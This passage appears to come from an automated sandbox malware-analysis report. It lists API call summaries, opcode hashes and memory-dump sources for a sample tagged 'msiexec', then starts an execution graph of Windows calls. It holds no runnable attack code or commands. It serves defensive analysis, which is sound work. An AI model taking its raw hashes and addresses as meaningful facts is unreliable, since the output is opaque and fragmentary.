                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrlen$lstrcat
                                                                                          • String ID:
                                                                                          • API String ID: 493641738-0
                                                                                          • Opcode ID: f9832582263f43db17b88609ce8a0e19e44c8c47f542ae11b2d87a0a9ce75be4
                                                                                          • Instruction ID: b1e17053998eb6852f4e7549c80c321419add864441ce39ab0b017182ede8ea2
                                                                                          • Opcode Fuzzy Hash: f9832582263f43db17b88609ce8a0e19e44c8c47f542ae11b2d87a0a9ce75be4
                                                                                          • Instruction Fuzzy Hash: 84F082361156107AE621276AEC85FBF7B7DEFC6A60F040019FA0D831909B595842A6F5
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 209091D0
                                                                                            • Part of subcall function 2090571E: HeapFree.KERNEL32(00000000,00000000,?,2090924F,?,00000000,?,00000000,?,20909276,?,00000007,?,?,20907E5A,?), ref: 20905734
                                                                                            • Part of subcall function 2090571E: GetLastError.KERNEL32(?,?,2090924F,?,00000000,?,00000000,?,20909276,?,00000007,?,?,20907E5A,?,?), ref: 20905746
                                                                                          • _free.LIBCMT ref: 209091E2
                                                                                          • _free.LIBCMT ref: 209091F4
                                                                                          • _free.LIBCMT ref: 20909206
                                                                                          • _free.LIBCMT ref: 20909218
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: eff38e5eb93716febf37996311aef2f083e097f9c9d650cd88fe525b2f7b0548
                                                                                          • Instruction ID: c06ec12407178b615d6afae4b387d77bdeb6a0c1873ba2828707778507119aac
                                                                                          • Opcode Fuzzy Hash: eff38e5eb93716febf37996311aef2f083e097f9c9d650cd88fe525b2f7b0548
                                                                                          • Instruction Fuzzy Hash: 2BF04FB162C640AB8A10DBDCD9C5D06BBEFEF302147508845FD0BD7540CA24FC80AA54
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 2090536F
                                                                                            • Part of subcall function 2090571E: HeapFree.KERNEL32(00000000,00000000,?,2090924F,?,00000000,?,00000000,?,20909276,?,00000007,?,?,20907E5A,?), ref: 20905734
                                                                                            • Part of subcall function 2090571E: GetLastError.KERNEL32(?,?,2090924F,?,00000000,?,00000000,?,20909276,?,00000007,?,?,20907E5A,?,?), ref: 20905746
                                                                                          • _free.LIBCMT ref: 20905381
                                                                                          • _free.LIBCMT ref: 20905394
                                                                                          • _free.LIBCMT ref: 209053A5
                                                                                          • _free.LIBCMT ref: 209053B6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: 438b8a3b895f8729f989a59129a093afdb615df4b35185bab94fc301aee39bfb
                                                                                          • Instruction ID: 09f52e424cfdd7c7edf295f43009fade51140b4ec1aa8e967823fd8a1a34589d
                                                                                          • Opcode Fuzzy Hash: 438b8a3b895f8729f989a59129a093afdb615df4b35185bab94fc301aee39bfb
                                                                                          • Instruction Fuzzy Hash: 1EF01D74E3C914EF8E115B689DC160ABBBAAF29A50341C246FC1793370D7390882FB84
                                                                                          APIs
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\System32\msiexec.exe,00000104), ref: 20904C1D
                                                                                          • _free.LIBCMT ref: 20904CE8
                                                                                          • _free.LIBCMT ref: 20904CF2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$FileModuleName
                                                                                          • String ID: C:\Windows\System32\msiexec.exe
                                                                                          • API String ID: 2506810119-1382325751
                                                                                          • Opcode ID: d4a715cfef2e9959d440f117f2783c895d6fa258a7ddfa0b2305b869543e68c9
                                                                                          • Instruction ID: 48f9ddd1cc5a9afa4d4c13673fb8fe5beec1da61363627336e2c5b2896012937
                                                                                          • Opcode Fuzzy Hash: d4a715cfef2e9959d440f117f2783c895d6fa258a7ddfa0b2305b869543e68c9
                                                                                          • Instruction Fuzzy Hash: 133173B1A05628ABEB11CBD98D81A9EBBFEEF85310F108096F94697210D7748A41DB50
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,20906FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 20908731
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 209087BA
                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 209087CC
                                                                                          • __freea.LIBCMT ref: 209087D5
                                                                                            • Part of subcall function 209056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 20905702
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                          • String ID:
                                                                                          • API String ID: 2652629310-0
                                                                                          • Opcode ID: 3e0d33ae6791dca2ce8ac96555f4aee4b42779fbbcb7ff3e600d2e1a68308754
                                                                                          • Instruction ID: 0fb9063974cd6374dfca0ade110286650b14d5d5cefd9f250935b4d8b256b4c9
                                                                                          • Opcode Fuzzy Hash: 3e0d33ae6791dca2ce8ac96555f4aee4b42779fbbcb7ff3e600d2e1a68308754
                                                                                          • Instruction Fuzzy Hash: AB31CE32A1021AABDF158FA4CC85EAF7BBAEF44210F2141A8FD4AD7554E735CD50DB90
                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32(2090C7DD), ref: 2090C7E6
                                                                                          • GetModuleHandleA.KERNEL32(?,2090C7DD), ref: 2090C838
                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 2090C860
                                                                                            • Part of subcall function 2090C803: GetProcAddress.KERNEL32(00000000,2090C7F4), ref: 2090C804
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc
                                                                                          • String ID:
                                                                                          • API String ID: 1646373207-0
                                                                                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                          • Instruction ID: 5582344b8a5c0439bb8abb9b4f796c2f8c684637d55186bfe4dddd1b60a9ad47
                                                                                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                          • Instruction Fuzzy Hash: B601D2C094524138AB1197F40C06BAA5FDE9B27660B24D7D6FF43C6193D9A4890ED3AE
                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,20901D66,00000000,00000000,?,20905C88,20901D66,00000000,00000000,00000000,?,20905E85,00000006,FlsSetValue), ref: 20905D13
                                                                                          • GetLastError.KERNEL32(?,20905C88,20901D66,00000000,00000000,00000000,?,20905E85,00000006,FlsSetValue,2090E190,FlsSetValue,00000000,00000364,?,20905BC8), ref: 20905D1F
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,20905C88,20901D66,00000000,00000000,00000000,?,20905E85,00000006,FlsSetValue,2090E190,FlsSetValue,00000000), ref: 20905D2D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 3177248105-0
                                                                                          • Opcode ID: 0086a195eeb011166de5b807049c3f0033173ebcb76eb996796e57bc2d821832
                                                                                          • Instruction ID: c2735cfcee3f46591011bae67bacbabff7cbe1005c7c1ad0556681f2bcd4952f
                                                                                          • Opcode Fuzzy Hash: 0086a195eeb011166de5b807049c3f0033173ebcb76eb996796e57bc2d821832
                                                                                          • Instruction Fuzzy Hash: BF01FC3661A632ABD7114BAC9C4CE4777AEEF057A1B104621F90BD7190D729DC01EAD0
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 2090655C
                                                                                            • Part of subcall function 209062BC: IsProcessorFeaturePresent.KERNEL32(00000017,209062AB,00000000,?,?,?,?,00000016,?,?,209062B8,00000000,00000000,00000000,00000000,00000000), ref: 209062BE
                                                                                            • Part of subcall function 209062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 209062E0
                                                                                            • Part of subcall function 209062BC: TerminateProcess.KERNEL32(00000000), ref: 209062E7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                          • String ID: *?$.
                                                                                          • API String ID: 2667617558-3972193922
                                                                                          • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                          • Instruction ID: 9e51907b46dd74b02ece812ec02e8c740a7736c87ae36cf0c6877b20597f7272
                                                                                          • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                          • Instruction Fuzzy Hash: 68518275E002299FDB04CFE8CC81AADBBFAEF58314F2481A9E455E7355E7359A01CB50
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strlen
                                                                                          • String ID: : $Se.
                                                                                          • API String ID: 4218353326-4089948878
                                                                                          • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                          • Instruction ID: bd5f8eb8458a27950c420fa4c7e4f4e8c18a23505c9c2ed2c4d827ef83e0c5c6
                                                                                          • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                          • Instruction Fuzzy Hash: C111E7B1900249AFCB11DFE8D841BDEFBFEAF19204F104096E546E7252E6705B02CB65
                                                                                          APIs
                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 20902903
                                                                                            • Part of subcall function 209035D2: RaiseException.KERNEL32(?,?,?,20902925,00000000,00000000,00000000,?,?,?,?,?,20902925,?,209121B8), ref: 20903632
                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 20902920
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                                                          • String ID: Unknown exception
                                                                                          • API String ID: 3476068407-410509341
                                                                                          • Opcode ID: b15e4eb8b54b251e2e181a407ff0618c2392626a85c0fe99da52cfd06bd1e1b9
                                                                                          • Instruction ID: e279b7c40c363639a5f9c4cb87380df0ff0fe9443e3394ecc8802a7794bd82a1
                                                                                          • Opcode Fuzzy Hash: b15e4eb8b54b251e2e181a407ff0618c2392626a85c0fe99da52cfd06bd1e1b9
                                                                                          • Instruction Fuzzy Hash: 43F0F43490420CB78B08A6E9EC85B7D736F9F10650F608170FE2792090EB35EA6585C0

                                                                                          Execution Graph

                                                                                          Execution Coverage:5.6%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:1.3%
                                                                                          Total number of Nodes:2000
                                                                                          Total number of Limit Nodes:76
                                                                                          execution_graph 40277 441819 40280 430737 40277->40280 40279 441825 40281 430756 40280->40281 40282 43076d 40280->40282 40283 430774 40281->40283 40284 43075f 40281->40284 40282->40279 40295 43034a memcpy 40283->40295 40294 4169a7 11 API calls 40284->40294 40287 4307ce 40288 430819 memset 40287->40288 40296 415b2c 11 API calls 40287->40296 40288->40282 40289 43077e 40289->40282 40289->40287 40292 4307fa 40289->40292 40291 4307e9 40291->40282 40291->40288 40297 4169a7 11 API calls 40292->40297 40294->40282 40295->40289 40296->40291 40297->40282 37678 442ec6 19 API calls 37852 4152c6 malloc 37853 4152e2 37852->37853 37854 4152ef 37852->37854 37856 416760 11 API calls 37854->37856 37856->37853 37857 4466f4 37876 446904 37857->37876 37859 446700 GetModuleHandleA 37862 446710 __set_app_type __p__fmode __p__commode 37859->37862 37861 4467a4 37863 4467ac __setusermatherr 37861->37863 37864 4467b8 37861->37864 37862->37861 37863->37864 37877 4468f0 _controlfp 37864->37877 37866 4467bd _initterm __wgetmainargs _initterm 37867 44681e GetStartupInfoW 37866->37867 37868 446810 37866->37868 37870 446866 GetModuleHandleA 37867->37870 37878 41276d 37870->37878 37874 446896 exit 37875 44689d _cexit 37874->37875 37875->37868 37876->37859 37877->37866 37879 41277d 37878->37879 37921 4044a4 LoadLibraryW 37879->37921 37881 412785 37913 412789 37881->37913 37929 414b81 37881->37929 37884 4127c8 37935 412465 memset ??2@YAPAXI 37884->37935 37886 4127ea 37947 40ac21 37886->37947 37891 412813 37966 40dd07 memset 37891->37966 37892 412827 37971 40db69 memset 37892->37971 37896 412822 37993 4125b6 ??3@YAXPAX DeleteObject 37896->37993 37897 40ada2 _wcsicmp 37898 41283d 37897->37898 37898->37896 37901 412863 CoInitialize 37898->37901 37976 41268e 37898->37976 37900 412966 37994 40b1ab free free 37900->37994 37992 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37901->37992 37905 41296f 37995 40b633 37905->37995 37907 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37912 412957 CoUninitialize 37907->37912 37918 4128ca 37907->37918 37912->37896 37913->37874 37913->37875 37914 4128d0 TranslateAcceleratorW 37915 412941 GetMessageW 37914->37915 37914->37918 37915->37912 37915->37914 37916 412909 IsDialogMessageW 37916->37915 37916->37918 37917 4128fd IsDialogMessageW 37917->37915 37917->37916 37918->37914 37918->37916 37918->37917 37919 41292b TranslateMessage DispatchMessageW 37918->37919 37920 41291f IsDialogMessageW 37918->37920 37919->37915 37920->37915 37920->37919 37922 4044cf GetProcAddress 37921->37922 37925 4044f7 37921->37925 37923 4044e8 FreeLibrary 37922->37923 37926 4044df 37922->37926 37924 4044f3 37923->37924 37923->37925 37924->37925 37927 404507 MessageBoxW 37925->37927 37928 40451e 37925->37928 37926->37923 37927->37881 37928->37881 37930 414b8a 37929->37930 37931 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37929->37931 37999 40a804 memset 37930->37999 37931->37884 37934 414b9e GetProcAddress 37934->37931 37937 4124e0 37935->37937 37936 412505 ??2@YAPAXI 37938 41251c 37936->37938 37941 412521 37936->37941 37937->37936 38021 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37938->38021 38010 444722 37941->38010 37946 41259b wcscpy 37946->37886 38026 40b1ab free free 37947->38026 37949 40ad76 38027 40aa04 37949->38027 37952 40a9ce malloc memcpy free free 37954 40ac5c 37952->37954 37953 40ad4b 37953->37949 38032 40a9ce 37953->38032 37954->37949 37954->37952 37954->37953 37956 40acf0 37954->37956 37957 40ace7 free 37954->37957 38030 40a8d0 7 API calls 37954->38030 37956->37954 38031 4099f4 malloc memcpy free 37956->38031 37957->37954 37962 40ada2 37963 40adc9 37962->37963 37965 40adaa 37962->37965 37963->37891 37963->37892 37964 40adb3 _wcsicmp 37964->37963 37964->37965 37965->37963 37965->37964 38040 40dce0 37966->38040 37968 40dd3a GetModuleHandleW 38045 40dba7 37968->38045 37972 40dce0 3 API calls 37971->37972 37973 40db99 37972->37973 38117 40dae1 37973->38117 38131 402f3a 37976->38131 37978 412766 37978->37896 37978->37901 37979 4126d3 _wcsicmp 37980 4126a8 37979->37980 37980->37978 37980->37979 37982 41270a 37980->37982 38165 4125f8 7 API calls 37980->38165 37982->37978 38134 411ac5 37982->38134 37992->37907 37993->37900 37994->37905 37996 40b640 37995->37996 37997 40b639 free 37995->37997 37998 40b1ab free free 37996->37998 37997->37996 37998->37913 38000 40a83b GetSystemDirectoryW 37999->38000 38001 40a84c wcscpy 37999->38001 38000->38001 38006 409719 wcslen 38001->38006 38004 40a881 LoadLibraryW 38005 40a886 38004->38005 38005->37931 38005->37934 38007 409724 38006->38007 38008 409739 wcscat LoadLibraryW 38006->38008 38007->38008 38009 40972c wcscat 38007->38009 38008->38004 38008->38005 38009->38008 38011 444732 38010->38011 38012 444728 DeleteObject 38010->38012 38022 409cc3 38011->38022 38012->38011 38014 412551 38015 4010f9 38014->38015 38016 401130 38015->38016 38017 401134 GetModuleHandleW LoadIconW 38016->38017 38018 401107 wcsncat 38016->38018 38019 40a7be 38017->38019 38018->38016 38020 40a7d2 38019->38020 38020->37946 38020->38020 38021->37941 38025 409bfd memset wcscpy 38022->38025 38024 409cdb CreateFontIndirectW 38024->38014 38025->38024 38026->37954 38028 40aa14 38027->38028 38029 40aa0a free 38027->38029 38028->37962 38029->38028 38030->37954 38031->37956 38033 40a9e7 38032->38033 38034 40a9dc free 38032->38034 38039 4099f4 malloc memcpy free 38033->38039 38035 40a9f3 38034->38035 38038 40a8d0 7 API calls 38035->38038 38037 40a9f2 38037->38035 38038->37949 38039->38037 38064 409bca GetModuleFileNameW 38040->38064 38042 40dce6 wcsrchr 38043 40dcf5 38042->38043 38044 40dcf9 wcscat 38042->38044 38043->38044 38044->37968 38065 44db70 38045->38065 38049 40dbfd 38068 4447d9 38049->38068 38052 40dc34 wcscpy wcscpy 38094 40d6f5 38052->38094 38053 40dc1f wcscpy 38053->38052 38056 40d6f5 3 API calls 38057 40dc73 38056->38057 38058 40d6f5 3 API calls 38057->38058 38059 40dc89 38058->38059 38060 40d6f5 3 API calls 38059->38060 38061 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38060->38061 38100 40da80 38061->38100 38064->38042 38066 40dbb4 memset memset 38065->38066 38067 409bca GetModuleFileNameW 38066->38067 38067->38049 38070 4447f4 38068->38070 38069 40dc1b 38069->38052 38069->38053 38070->38069 38071 444807 ??2@YAPAXI 38070->38071 38072 44481f 38071->38072 38073 444873 _snwprintf 38072->38073 38074 4448ab wcscpy 38072->38074 38107 44474a 8 API calls 38073->38107 38076 4448bb 38074->38076 38108 44474a 8 API calls 38076->38108 38077 4448a7 38077->38074 38077->38076 38079 4448cd 38109 44474a 8 API calls 38079->38109 38081 4448e2 38110 44474a 8 API calls 38081->38110 38083 4448f7 38111 44474a 8 API calls 38083->38111 38085 44490c 38112 44474a 8 API calls 38085->38112 38087 444921 38113 44474a 8 API calls 38087->38113 38089 444936 38114 44474a 8 API calls 38089->38114 38091 44494b 38115 44474a 8 API calls 38091->38115 38093 444960 ??3@YAXPAX 38093->38069 38095 44db70 38094->38095 38096 40d702 memset GetPrivateProfileStringW 38095->38096 38097 40d752 38096->38097 38098 40d75c WritePrivateProfileStringW 38096->38098 38097->38098 38099 40d758 38097->38099 38098->38099 38099->38056 38101 44db70 38100->38101 38102 40da8d memset 38101->38102 38103 40daac LoadStringW 38102->38103 38104 40dac6 38103->38104 38104->38103 38106 40dade 38104->38106 38116 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38104->38116 38106->37896 38107->38077 38108->38079 38109->38081 38110->38083 38111->38085 38112->38087 38113->38089 38114->38091 38115->38093 38116->38104 38127 409b98 GetFileAttributesW 38117->38127 38119 40daea 38120 40db63 38119->38120 38121 40daef wcscpy wcscpy GetPrivateProfileIntW 38119->38121 38120->37897 38128 40d65d GetPrivateProfileStringW 38121->38128 38123 40db3e 38129 40d65d GetPrivateProfileStringW 38123->38129 38125 40db4f 38130 40d65d GetPrivateProfileStringW 38125->38130 38127->38119 38128->38123 38129->38125 38130->38120 38166 40eaff 38131->38166 38135 411ae2 memset 38134->38135 38136 411b8f 38134->38136 38207 409bca GetModuleFileNameW 38135->38207 38148 411a8b 38136->38148 38138 411b0a wcsrchr 38139 411b22 wcscat 38138->38139 38140 411b1f 38138->38140 38208 414770 wcscpy wcscpy wcscpy CloseHandle 38139->38208 38140->38139 38142 411b67 38209 402afb 38142->38209 38146 411b7f 38265 40ea13 SendMessageW memset SendMessageW 38146->38265 38149 402afb 27 API calls 38148->38149 38150 411ac0 38149->38150 38151 4110dc 38150->38151 38152 41113e 38151->38152 38157 4110f0 38151->38157 38290 40969c LoadCursorW SetCursor 38152->38290 38154 411143 38291 444a54 38154->38291 38294 4032b4 38154->38294 38155 4110f7 _wcsicmp 38155->38157 38156 411157 38158 40ada2 _wcsicmp 38156->38158 38157->38152 38157->38155 38312 410c46 10 API calls 38157->38312 38161 411167 38158->38161 38159 4111af 38161->38159 38162 4111a6 qsort 38161->38162 38162->38159 38165->37980 38167 40eb10 38166->38167 38180 40e8e0 38167->38180 38170 40eb6c memcpy memcpy 38171 40ebe1 38170->38171 38172 40ebb7 38170->38172 38171->38170 38173 40ebf2 ??2@YAPAXI ??2@YAPAXI 38171->38173 38172->38171 38174 40d134 16 API calls 38172->38174 38175 40ec2e ??2@YAPAXI 38173->38175 38178 40ec65 38173->38178 38174->38172 38175->38178 38190 40ea7f 38178->38190 38179 402f49 38179->37980 38181 40e8f2 38180->38181 38182 40e8eb ??3@YAXPAX 38180->38182 38183 40e900 38181->38183 38184 40e8f9 ??3@YAXPAX 38181->38184 38182->38181 38185 40e90a ??3@YAXPAX 38183->38185 38187 40e911 38183->38187 38184->38183 38185->38187 38186 40e931 ??2@YAPAXI ??2@YAPAXI 38186->38170 38187->38186 38188 40e921 ??3@YAXPAX 38187->38188 38189 40e92a ??3@YAXPAX 38187->38189 38188->38189 38189->38186 38191 40aa04 free 38190->38191 38192 40ea88 38191->38192 38193 40aa04 free 38192->38193 38194 40ea90 38193->38194 38195 40aa04 free 38194->38195 38196 40ea98 38195->38196 38197 40aa04 free 38196->38197 38198 40eaa0 38197->38198 38199 40a9ce 4 API calls 38198->38199 38200 40eab3 38199->38200 38201 40a9ce 4 API calls 38200->38201 38202 40eabd 38201->38202 38203 40a9ce 4 API calls 38202->38203 38204 40eac7 38203->38204 38205 40a9ce 4 API calls 38204->38205 38206 40ead1 38205->38206 38206->38179 38207->38138 38208->38142 38266 40b2cc 38209->38266 38211 402b0a 38212 40b2cc 27 API calls 38211->38212 38213 402b23 38212->38213 38214 40b2cc 27 API calls 38213->38214 38215 402b3a 38214->38215 38216 40b2cc 27 API calls 38215->38216 38217 402b54 38216->38217 38218 40b2cc 27 API calls 38217->38218 38219 402b6b 38218->38219 38220 40b2cc 27 API calls 38219->38220 38221 402b82 38220->38221 38222 40b2cc 27 API calls 38221->38222 38223 402b99 38222->38223 38224 40b2cc 27 API calls 38223->38224 38225 402bb0 38224->38225 38226 40b2cc 27 API calls 38225->38226 38227 402bc7 38226->38227 38228 40b2cc 27 API calls 38227->38228 38229 402bde 38228->38229 38230 40b2cc 27 API calls 38229->38230 38231 402bf5 38230->38231 38232 40b2cc 27 API calls 38231->38232 38233 402c0c 38232->38233 38234 40b2cc 27 API calls 38233->38234 38235 402c23 38234->38235 38236 40b2cc 27 API calls 38235->38236 38237 402c3a 38236->38237 38238 40b2cc 27 API calls 38237->38238 38239 402c51 38238->38239 38240 40b2cc 27 API calls 38239->38240 38241 402c68 38240->38241 38242 40b2cc 27 API calls 38241->38242 38243 402c7f 38242->38243 38244 40b2cc 27 API calls 38243->38244 38245 402c99 38244->38245 38246 40b2cc 27 API calls 38245->38246 38247 402cb3 38246->38247 38248 40b2cc 27 API calls 38247->38248 38249 402cd5 38248->38249 38250 40b2cc 27 API calls 38249->38250 38251 402cf0 38250->38251 38252 40b2cc 27 API calls 38251->38252 38253 402d0b 38252->38253 38254 40b2cc 27 API calls 38253->38254 38255 402d26 38254->38255 38256 40b2cc 27 API calls 38255->38256 38257 402d3e 38256->38257 38258 40b2cc 27 API calls 38257->38258 38259 402d59 38258->38259 38260 40b2cc 27 API calls 38259->38260 38261 402d78 38260->38261 38262 40b2cc 27 API calls 38261->38262 38263 402d93 38262->38263 38264 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38263->38264 38264->38146 38265->38136 38269 40b58d 38266->38269 38268 40b2d1 38268->38211 38270 40b5a4 GetModuleHandleW FindResourceW 38269->38270 38271 40b62e 38269->38271 38272 40b5c2 LoadResource 38270->38272 38274 40b5e7 38270->38274 38271->38268 38273 40b5d0 SizeofResource LockResource 38272->38273 38272->38274 38273->38274 38274->38271 38282 40afcf 38274->38282 38276 40b608 memcpy 38285 40b4d3 memcpy 38276->38285 38278 40b61e 38286 40b3c1 18 API calls 38278->38286 38280 40b626 38287 40b04b 38280->38287 38283 40b04b ??3@YAXPAX 38282->38283 38284 40afd7 ??2@YAPAXI 38283->38284 38284->38276 38285->38278 38286->38280 38288 40b051 ??3@YAXPAX 38287->38288 38289 40b05f 38287->38289 38288->38289 38289->38271 38290->38154 38292 444a64 FreeLibrary 38291->38292 38293 444a83 38291->38293 38292->38293 38293->38156 38295 4032c4 38294->38295 38296 40b633 free 38295->38296 38297 403316 38296->38297 38313 44553b 38297->38313 38301 403480 38511 40368c 15 API calls 38301->38511 38303 403489 38304 40b633 free 38303->38304 38305 403495 38304->38305 38305->38156 38306 4033a9 memset memcpy 38307 4033ec wcscmp 38306->38307 38308 40333c 38306->38308 38307->38308 38308->38301 38308->38306 38308->38307 38509 4028e7 11 API calls 38308->38509 38510 40f508 6 API calls 38308->38510 38311 403421 _wcsicmp 38311->38308 38312->38157 38314 445548 38313->38314 38315 445599 38314->38315 38512 40c768 38314->38512 38316 4455a8 memset 38315->38316 38324 4457f2 38315->38324 38595 403988 38316->38595 38322 4455e5 38337 445672 38322->38337 38342 44560f 38322->38342 38327 445854 38324->38327 38698 403e2d memset memset memset memset memset 38324->38698 38325 4458bb memset memset 38329 414c2e 14 API calls 38325->38329 38371 4458aa 38327->38371 38721 